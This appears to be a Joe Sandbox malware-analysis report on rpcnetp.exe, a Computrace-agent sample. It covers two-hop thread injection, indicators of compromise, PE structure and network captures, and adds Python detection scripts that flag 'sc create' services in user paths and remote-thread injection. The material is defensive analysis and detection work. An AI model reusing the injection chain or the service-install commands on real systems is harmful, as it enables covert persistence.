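The behaviour above is a two-hop injection chain: rpcnetp.exe allocates memory in and creates a thread inside a svchost.exe it spawned itself, that svchost.exe does the same to iexplore.exe, and the thread start address (EIP 72B22314) lies in the same 0x72b20000 module that the antivirus table later reports as unpacked from all three processes. The `sc create EcVoz binpath= ...` and `sc start EcVoz` commands, by contrast, are the sandbox's own "Run as Windows Service" cookbook (see Run name under General Information), not something the sample does; they are still the textbook shape of a service whose binary lives in a user-writable path. The following is an added example, not part of the Joe Sandbox report, that runs the three checks a detection engineer would derive from this section over hand-written Sysmon-style records modelled on the process tree. The event field names follow Sysmon Event ID 1 and Event ID 8; the allow-lists are assumptions to be tuned per estate.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style records that mirror this report's process tree
# (Event ID 1 = process creation, Event ID 8 = CreateRemoteThread). They are
# hand-written for the example, not telemetry captured from the sandbox.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "Image": r"C:\Windows\SysWOW64\sc.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe'"},
    {"EventID": "1", "Image": r"C:\Windows\SysWOW64\sc.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": "sc start EcVoz"},
    {"EventID": "1", "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "ParentImage": r"C:\Users\user\Desktop\rpcnetp.exe",
     "CommandLine": r"C:\Windows\system32\svchost.exe"},
    {"EventID": "8", "SourceImage": r"C:\Users\user\Desktop\rpcnetp.exe",
     "TargetImage": r"C:\Windows\SysWOW64\svchost.exe",
     "StartAddress": "0x72B22314"},
    {"EventID": "8", "SourceImage": r"C:\Windows\SysWOW64\svchost.exe",
     "TargetImage": r"C:\Program Files (x86)\Internet Explorer\iexplore.exe",
     "StartAddress": "0x72B22314"},
    # benign control row: services.exe is the expected parent of svchost.exe
    {"EventID": "1", "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

# Paths a standard user can write to; a service binary there is a red flag.
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp|AppData)\\", re.I)
# Captures the service name and the binpath= argument of an `sc create`.
SC_CREATE = re.compile(
    r"\bsc(?:\.exe)?\s+create\s+(\S+).*?binpath=\s*['\"]?([^'\"]+)", re.I)
# Assumption: allow-lists to be tuned per estate, deliberately short here.
EXPECTED_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe"}
LEGIT_REMOTE_THREAD_SOURCES = {"csrss.exe", "wininit.exe", "winlogon.exe",
                               "services.exe", "msmpeng.exe", "wmiprvse.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage_events(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule, detail) findings for the patterns this report exhibits."""
    findings: List[Tuple[str, str]] = []
    start_addrs: Dict[str, set] = {}   # thread start address -> target images
    for e in events:
        if e["EventID"] == "1":
            m = SC_CREATE.search(e.get("CommandLine", ""))
            if m and USER_WRITABLE.search(m.group(2)):
                findings.append(("service_binary_in_user_path",
                                 f"{m.group(1)} -> {m.group(2).strip()}"))
            if (basename(e["Image"]) == "svchost.exe"
                    and basename(e["ParentImage"]) not in EXPECTED_SVCHOST_PARENTS):
                findings.append(("svchost_unexpected_parent",
                                 f"{e['ParentImage']} -> {e['Image']}"))
        elif e["EventID"] == "8":
            if basename(e["SourceImage"]) not in LEGIT_REMOTE_THREAD_SOURCES:
                findings.append(("remote_thread_from_unexpected_source",
                                 f"{e['SourceImage']} -> {e['TargetImage']}"))
            start_addrs.setdefault(e["StartAddress"].lower(), set()).add(
                basename(e["TargetImage"]))
    # The same thread start address in two different target processes means
    # the same injected module is mapped at the same base in both of them.
    for addr, targets in start_addrs.items():
        if len(targets) > 1:
            findings.append(("shared_remote_thread_start_address",
                             f"{addr} in {', '.join(sorted(targets))}"))
    return findings


if __name__ == "__main__":
    for rule, detail in triage_events(SAMPLE_EVENTS):
        print(f"{rule:40s} {detail}")
```

Against the constructed records the function returns five findings: the service binary under C:\Users, svchost.exe with rpcnetp.exe as parent, two remote threads from non-allow-listed sources, and the shared start address 0x72b22314 seen in both svchost.exe and iexplore.exe; the services.exe-spawned svchost.exe control row produces nothing. In the sandbox case the first finding is an artefact of how the sample was launched, which is exactly why the analyst should read Run name before attributing the service to the sample.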

Mitre Att&ck Matrix

Techniques are listed per tactic column. A number in parentheses is the signature count the report attaches to a technique observed for this sample, copied as shown; techniques without a number belong to the matrix template and were not matched.

Initial Access: Valid Accounts (1), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Service Execution (3), Native API (1), Shared Modules (1), At (Windows), Cron, Launchd
Persistence: Valid Accounts (1), Windows Service (4), DLL Side-Loading (1), Logon Script (Mac), Network Logon Script, Rc.common
Privilege Escalation: Valid Accounts (1), Access Token Manipulation (1), Windows Service (4), Process Injection (4 2 1), DLL Side-Loading (1), Rc.common
Defense Evasion: Masquerading (1), Valid Accounts (1), Access Token Manipulation (1), Process Injection (4 2 1), Obfuscated Files or Information (1), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery (1), Process Discovery (1), System Information Discovery (3), System Network Configuration Discovery, Remote System Discovery, System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Command and Control: Non-Application Layer Protocol (2), Application Layer Protocol (2), Steganography, Protocol Impersonation, Fallback Channels, Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features
Behavior Graph (ID: 499091, Sample: rpcnetp.exe, Startdate: 07/10/2021, Architecture: WINDOWS, Score: 72)

Signatures attached to the whole run: Multi AV Scanner detection for dropped file; Sigma detected: Suspicious Svchost Process

  • rpcnetp.exe (started from the root)
      • dropped file: C:\Users\user\Desktop\rpcnetp.dll (PE32)
      • signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection)
      • started: svchost.exe
          • signatures: Writes to foreign memory regions; Allocates memory in foreign processes; DLL side loading technique detected; Creates a thread in another existing process (thread injection)
          • started: iexplore.exe
              • network: search.namequery.com 209.53.113.223, client ports 49775, 49776, 49777, ASN852CA, Canada
              • signatures: Creates a thread in another existing process (thread injection); Injects files into Windows application
  • cmd.exe (started from the root); started conhost.exe and sc.exe
  • cmd.exe (started from the root); started conhost.exe and sc.exe
  • svchost.exe (started from the root)

Antivirus results (Source | Detection | Scanner | Label)

Sample:
  • rpcnetp.exe | 3% | Virustotal
  • rpcnetp.exe | 5% | Metadefender
  • rpcnetp.exe | 3% | ReversingLabs
Dropped files:
  • C:\Users\user\Desktop\rpcnetp.dll | 7% | Virustotal
  • C:\Users\user\Desktop\rpcnetp.dll | 7% | ReversingLabs
Unpacked PE files (memory dumps):
  • 8.1.iexplore.exe.72b20000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
  • 7.1.svchost.exe.72b20000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
  • 6.1.rpcnetp.exe.a10000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
  • 6.1.rpcnetp.exe.72b20000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
Domains:
  • search.namequery.com | 2% | Virustotal
URLs:
  • http://search.namequery.com/ | 2% | Virustotal
  • http://search.namequery.com/ | 0% | Avira URL Cloud | safe


Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
  • search.namequery.com | 209.53.113.223 | true | false | none | unknown

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
  • http://search.namequery.com/ | false | 2% Virustotal; Avira URL Cloud: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
  • 209.53.113.223 | search.namequery.com | Canada | 852 | ASN852CA | false

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:499091
Start date:07.10.2021
Start time:21:22:39
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 46s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:rpcnetp.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:Run as Windows Service
Number of new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal72.evad.winEXE@14/5@1/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 78.6% (good quality ratio 76.8%)
  • Quality average: 88.1%
  • Quality standard deviation: 22.9%
HCA Information:
  • Successful, ratio: 66%
  • Number of executed functions: 28
  • Number of non-executed functions: 51
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
  • Excluded IPs from analysis (whitelisted): 20.82.209.183, 95.100.218.79, 204.79.197.222, 93.184.221.240, 209.197.3.8
  • Excluded domains from analysis (whitelisted): fp.msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, wu.ec.azureedge.net, wu-shim.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, arc.msn.com, wu.azureedge.net, a-0019.a-msedge.net, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, a-0019.standard.a-msedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, 1.perf.msedge.net
  • Not all processes were analyzed; the report is missing behavior information
Analysis events (Time | Type | Description)
  • 21:23:39 | API Interceptor | 1096x Sleep call for process: rpcnetp.exe modified
Context from other analyses (Match | Associated Sample Name / URL | Detection | Context)

IP 209.53.113.223:
  • NTAgent.exe | malicious | search.namequery.com/
  • rpcnet.exe | malicious | search.dnssearch.org/
  • rpcnetp.exe | malicious | search.namequery.com/

Domain search.namequery.com:
  • NTAgent.exe | malicious | 209.53.113.223
  • rpcnet.exe | malicious | 209.53.113.223
  • rpcnetp.exe | malicious | 209.53.113.223

ASN852CA:
  • e7HWBo7yQM | malicious | 75.152.119.182
  • GaSBpMyVub | malicious | 162.157.2.46
  • ntpclient | malicious | 204.191.51.200
  • arm7-20211004-1530 | malicious | 209.89.133.142
  • Zot0D0dD8J | malicious | 173.183.134.242
  • lessie.arm | malicious | 207.229.7.32
  • sora.arm | malicious | 161.188.162.163
  • NazNIp21Xu | malicious | 205.206.179.186
  • LRLZJUXBPk | malicious | 75.153.94.132
  • P2gQCIjHzq | malicious | 23.16.230.107
  • sora.arm | malicious | 75.159.255.198
  • XO2PcLc9yO | malicious | 205.206.220.151
  • whoareyou.arm7 | malicious | 162.157.2.71
  • GbjE8Awfrz | malicious | 75.155.101.227
  • xd.arm | malicious | 154.5.124.11
  • soramrk.x86 | malicious | 142.179.228.81
  • xd.arm | malicious | 99.199.0.194
  • U1gjyXpR35 | malicious | 23.16.38.70
  • E2ecGhjXtG | malicious | 108.172.196.183
  • ShxmSBgPmy | malicious | 154.5.100.23
C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\1942f959aae25ff5e177f0a0e912022f_d06ed635-68f6-4e9a-955c-4899f5f57b9a
Process:C:\Windows\SysWOW64\svchost.exe
File Type:data
Category:dropped
Size (bytes):57
Entropy (8bit):2.062967662624547
Encrypted:false
SSDEEP:3:/lEltfgnwT:yvT
MD5:B5D2B9D74D52DAC47A3F3CB1D065305F
SHA1:41A4742BC23F3A6FF61C60884604DA6448FFF274
SHA-256:6359A4FCB0DABE70B88913A6A03CC21385459B8A924A6B3688A2E185C54DAAFA
SHA-512:01EA77C5972D33494C10D6ADB47CB3F30EAC1AA4B93D6BAAFB75299AA99FED818A6275801BAAE92C18AC5D3C64443BB631A63C2B39B1B88BCD774218BB2B990F
Malicious:false
Preview: ........................................computer$.
C:\Users\user\Desktop\rpcnetp.dll
Process:C:\Users\user\Desktop\rpcnetp.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):22934
Entropy (8bit):6.250397881773485
Encrypted:false
SSDEEP:384:yaU8dza3ee7IuRMksm9XiL1TN5Aim2DYedCH7iAYxh+aVBKIwvP4o94Iwd:Ddzxe79/9XiL1JPR0edSOAqzBRwX4oK3
MD5:D98DCCF777889A0A9BEEEE2923F511A9
SHA1:0917C66788073AFC994841943D6D1446EFB429C3
SHA-256:E57C660DB9EA653404A0664F0089B92B3D4B954C970EC6AD1DAD999AC50B5CDF
SHA-512:D048E1787DE4C26D143FD3363F28260040D25901D6305BE81106D3B58DBCFEB747EC4F16D8666787F14609090F7B7A80CE5244F767E6B397670262D76E6FC393
Malicious:true
Yara Hits:
  • Rule: PUP_ComputraceAgent, Description: Absolute Computrace Agent Executable, Source: C:\Users\user\Desktop\rpcnetp.dll, Author: ASERT - Arbor Networks (slightly modified by Florian Roth)
Antivirus:
  • Antivirus: Virustotal, Detection: 7%, Browse
  • Antivirus: ReversingLabs, Detection: 7%
Preview: MZ.............j........@...................................H....j......PE..L....U.U.................L..........u6.......`....@.......................................@..........................[..F...<T..x.......................................................................................L............................text....K.......L.................. ..`.data........`.......P..............@....cdata..<....p.......R..............@....reloc...............V..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\Desktop\rpcnetp.dll:Zone.Identifier
Process:C:\Users\user\Desktop\rpcnetp.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:false
Preview: [ZoneTransfer]....ZoneId=0
C:\servicereg.log
Process:C:\Windows\SysWOW64\sc.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):28
Entropy (8bit):3.678439190827718
Encrypted:false
SSDEEP:3:4A4AnXjzSv:4HAnXjg
MD5:A8F4D690C5BDE96AD275C7D4ABE0E3D3
SHA1:7C62C96EFD2CA4F3C3EBF0B24C9B5B4C04A4570A
SHA-256:596CCC911C1772735AAC6A6B756A76D3D55BCECD006B980CF147090B2243FA7B
SHA-512:A875EBE3C5CDF222FF9D08576F4D996AF827A1C86B3E758CE23F6B33530D512A82CE8E39E519837512080C6212A0A19B3385809BE5F5001C4E488DD79550B852
Malicious:false
Preview: [SC] CreateService SUCCESS..
C:\servicestart.log
Process:C:\Windows\SysWOW64\sc.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):421
Entropy (8bit):3.505853435114574
Encrypted:false
SSDEEP:6:lg3D/8Fkov+gVKBRjGxVVLvH2s/u8qLLFmLaZnsHgm66//V+NmASCefq:lgAzv+gV0qVbH2suZLQqOVKmAJcq
MD5:6A48546AF33EB7FDD7E14585D144690C
SHA1:8CA1A55CE066780DB47108C241FBF0ECFFEDED90
SHA-256:298B76A794423060FE25C90832043183E8FE0B31C880626ADDE20F6417289DAE
SHA-512:B2DC8E096EA62C51EB821F5A87EC9EE86BCAE964BE55D571D32A4BEBD52E51A60BC0AAC51877D1069228B1029A64B6C15A3A2C8EB16A52336201B59431398AAC
Malicious:false
Preview: ..SERVICE_NAME: EcVoz .. TYPE : 10 WIN32_OWN_PROCESS .. STATE : 2 START_PENDING .. (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN).. WIN32_EXIT_CODE : 0 (0x0).. SERVICE_EXIT_CODE : 0 (0x0).. CHECKPOINT : 0x0.. WAIT_HINT : 0x7d0.. PID : 7072.. FLAGS : ..

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.250156336870832
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.94%
  • Clipper DOS Executable (2020/12) 0.02%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
File name:rpcnetp.exe
File size:22932
MD5:57bd3200910a8d2c85b1927b27123a6b
SHA1:bd08ae784aa0ed5428347c861ebeb71554af217f
SHA256:f5157e5b8afe1f79f29c947449477d13ede3d7341699256e62966474a7ee1eb5
SHA512:855095db2b996150afc6f5025270fc4f9f5b178bb3969f00e313c867570eca08f58ca5caef1c3950d83ea513434d4efdba24371a6da864665fcfb9288e8dae73
SSDEEP:384:yaU8dza3ee7IuRMksm9XiL1TN5Aim2DYedCH7iAYxh+aVBKIwvP4o94IwS:Ddzxe79/9XiL1JPR0edSOAqzBRwX4oKw
File Content Preview:MZ.............j........@...................................H....j......PE..L....U.U.................L..........u6.......`....@.......................................@..........................[..F...<T..x..................................................

File Icon

Icon Hash:00828e8e8686b000

General

Entrypoint:0x403675
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x55115511 [Tue Mar 24 12:14:09 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:badaaa8b908ad021835c0e473265ef44
Instruction
push ebp
mov ebp, esp
push esi
mov esi, 004060C4h
xor eax, eax
cmp dword ptr [esi], eax
jne 00007F20ECC0138Fh
push eax
call dword ptr [004010C8h]
mov ecx, dword ptr [ebp+08h]
jecxz 00007F20ECC01392h
cmp eax, ecx
je 00007F20ECC0138Eh
mov dword ptr [esi], ecx
push eax
push dword ptr [00401348h]
push ecx
call dword ptr [004010A0h]
cmp eax, 00402658h
pop eax
jne 00007F20ECC01376h
call 00007F20ECC019D0h
mov eax, 00000001h
mov dword ptr [0040608Ch], eax
pop esi
leave
retn 000Ch
mov dword ptr [esi], eax
pop esi
leave
jmp 00007F20ECC00F7Ah
push ebx
push esi
push edi
mov ebx, edx
xor edi, edi
mov esi, edi
mov al, byte ptr [esi+ebx]
inc edi
add al, al
mov byte ptr [esi+ecx], al
cmp edi, dword ptr [esp+10h]
jnl 00007F20ECC0136Fh
mov dl, byte ptr [edi+ecx]
shr dl, 00000007h
or dl, al
mov byte ptr [esi+ecx], dl
jmp 00007F20ECC01344h
pop edi
pop esi
pop ebx
retn 0004h
push ebp
mov ebp, esp
sub esp, 00000184h
push ebx
push esi
mov esi, dword ptr [ebp+18h]
push edi
push esi
push 00000000h
lea eax, dword ptr [ebp-00000184h]
push eax
call 00007F20ECC02980h
mov edi, dword ptr [ebp+10h]
mov edx, esi
mov ecx, edi
mov byte ptr [ebp-00000184h], 00000001h
call 00007F20ECC01616h
mov ebx, eax
jmp 00007F20ECC0139Bh
push dword ptr [ebp+14h]
lea edx, dword ptr [ebp-00000184h]
push eax
mov ecx, edx
dec ebx
call 00007F20ECC01263h
mov eax, ebx
Data directories (Name | Virtual Address | Virtual Size | Is in Section)
  • IMAGE_DIRECTORY_ENTRY_EXPORT | 0x5b90 | 0x46 | .text
  • IMAGE_DIRECTORY_ENTRY_IMPORT | 0x543c | 0x78 | .text
  • IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
  • IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
  • IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
  • IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8000 | 0x394 | .reloc
  • IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
  • IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
  • IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
  • IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
  • IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
  • IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
  • IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x14c | .text
  • IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
  • IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
  • IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections (Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics)
  • .text | 0x1000 | 0x4bd6 | 0x4c00 | False | 0.651624177632 | data | 6.54556135074 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
  • .data | 0x6000 | 0x1b8 | 0x200 | False | 0.11328125 | data | 0.461954390647 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
  • .cdata | 0x7000 | 0x23c | 0x400 | False | 0.16796875 | data | 1.37476659487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
  • .reloc | 0x8000 | 0x394 | 0x394 | False | 0.909388646288 | data | 6.52173896111 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
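The section table is where the "PE file contains sections with non-standard names" signature from the overview comes from: .cdata is not a name any common linker emits on its own, and it is the only section carrying IMAGE_SCN_MEM_SHARED together with IMAGE_SCN_MEM_WRITE, which makes the loader map a single writable copy of it into every process that loads the image. The Entropy column is 8-bit Shannon entropy (bits per byte). The following is an added example, not code from the Joe Sandbox report, that encodes the section checks an analyst applies by eye to such a table and shows how the entropy figure is computed; the section rows are copied from the table above, and the list of "standard" section names is an assumption that should be extended for the toolchains seen in your estate.

```python
import math
from collections import Counter
from typing import Dict, List, Set

# Section table copied from this report's static analysis; the flag sets are
# the IMAGE_SCN_* characteristics listed there, entropies rounded to 4 places.
SECTIONS: List[Dict] = [
    {"name": ".text", "vaddr": 0x1000, "vsize": 0x4bd6, "rawsize": 0x4c00, "entropy": 6.5456,
     "flags": {"IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_READ"}},
    {"name": ".data", "vaddr": 0x6000, "vsize": 0x1b8, "rawsize": 0x200, "entropy": 0.4620,
     "flags": {"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_WRITE", "IMAGE_SCN_MEM_READ"}},
    {"name": ".cdata", "vaddr": 0x7000, "vsize": 0x23c, "rawsize": 0x400, "entropy": 1.3748,
     "flags": {"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_WRITE",
               "IMAGE_SCN_MEM_SHARED", "IMAGE_SCN_MEM_READ"}},
    {"name": ".reloc", "vaddr": 0x8000, "vsize": 0x394, "rawsize": 0x394, "entropy": 6.5217,
     "flags": {"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_DISCARDABLE", "IMAGE_SCN_MEM_READ"}},
]

# Assumption: names the usual linkers emit; anything else deserves a look.
STANDARD_NAMES: Set[str] = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                            ".reloc", ".bss", ".tls", ".pdata", ".crt", ".didat"}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for
    uniformly distributed bytes. This is what the report's Entropy (8bit) column is."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def triage_sections(sections: List[Dict], packed_threshold: float = 7.0) -> Dict[str, List[str]]:
    """Return {section name: [reasons]} for the sections that deserve attention."""
    findings: Dict[str, List[str]] = {}
    for s in sections:
        f, reasons = s["flags"], []
        if s["name"].lower() not in STANDARD_NAMES:
            reasons.append("non-standard section name")
        if {"IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_WRITE"} <= f:
            reasons.append("writable and executable (self-modifying code or unpacking stub)")
        if {"IMAGE_SCN_MEM_SHARED", "IMAGE_SCN_MEM_WRITE"} <= f:
            reasons.append("shared writable section: one copy is mapped into every process that loads the image")
        if "IMAGE_SCN_MEM_EXECUTE" in f and s["entropy"] > packed_threshold:
            reasons.append(f"high-entropy code ({s['entropy']:.2f} bits/byte), likely packed or encrypted")
        if s["rawsize"] == 0 and s["vsize"] > 0:
            reasons.append("no data on disk but non-zero virtual size (filled at runtime)")
        if s["rawsize"] and s["vsize"] > 2 * s["rawsize"]:
            reasons.append("virtual size far exceeds raw size (room for unpacked code)")
        if reasons:
            findings[s["name"]] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in triage_sections(SECTIONS).items():
        print(name, "->", "; ".join(reasons))
```

On this table only .cdata is flagged, for its name and for the shared-writable combination; .text at 6.55 bits/byte sits below the 7.0 packing threshold, which agrees with the report finding code obfuscation rather than a packer. The threshold is a convention, not a property of the format: compressed resources or embedded certificates routinely push a data section above it, so the check is restricted to executable sections.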
Imports (DLL | Functions)
  • ADVAPI32.dll | RegisterServiceCtrlHandlerA, RegCloseKey, RegOpenKeyA, CreateProcessAsUserA, StartServiceCtrlDispatcherA, RegQueryValueExA, SetServiceStatus, RegDeleteValueA, RegEnumValueA, DuplicateTokenEx, OpenProcessToken, SetTokenInformation
  • KERNEL32.dll | CloseHandle, CreateProcessA, SetStdHandle, LocalAlloc, DeleteCriticalSection, GetStdHandle, LeaveCriticalSection, RtlUnwind, GetSystemDirectoryA, CreateThread, ResumeThread, VirtualAllocEx, OpenProcess, LocalFree, WriteProcessMemory, CreateRemoteThread, ReadProcessMemory, InitializeCriticalSection, GetVersion, CopyFileA, TerminateThread, lstrlenA, GetBinaryTypeA, GetCurrentThreadId, VirtualFreeEx, ExitProcess, LoadLibraryA, GetProcAddress, WaitForMultipleObjects, WaitForSingleObject, GetExitCodeThread, lstrcatA, GetCurrentProcessId, FreeLibrary, ExitThread, RaiseException, lstrcpyA, GetModuleHandleA, SetEvent, CreateEventA, Sleep, lstrcmpiA, ResetEvent, CreateFileA, TerminateProcess, WriteFile, SetFilePointer, GetModuleFileNameA, SetThreadPriority, EnterCriticalSection
  • USER32.dll | CreateWindowExA, SetTimer, GetMessageA, TranslateMessage, RegisterClassA, KillTimer, DispatchMessageA, PostMessageA, PostThreadMessageA, PeekMessageA, PostQuitMessage, wsprintfA, DefWindowProcA
  • USERENV.dll | CreateEnvironmentBlock
  • WSOCK32.dll | inet_addr, ioctlsocket
Exports (Name | Ordinal | Address)
  • rpcnetp | 1 | 0x402658

Network Behavior


Network Port Distribution

  • Total Packets: 123
  • 80 (HTTP)
  • 53 (DNS)
TCP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP)
Oct 7, 2021 21:23:45.489679098 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:45.489749908 CEST | 49776 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:45.654690981 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:23:45.654717922 CEST | 80 | 49776 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:23:46.163032055 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:46.163655996 CEST | 49776 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:48.163186073 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:48.163634062 CEST | 49776 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:48.327733040 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:23:48.327856064 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:48.328999996 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
Oct 7, 2021 21:23:48.494014978 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:23:48.602479935 CEST | 80 | 49775 | 209.53.113.223 | 192.168.2.4
Oct 7, 2021 21:23:48.602603912 CEST | 49775 | 80 | 192.168.2.4 | 209.53.113.223
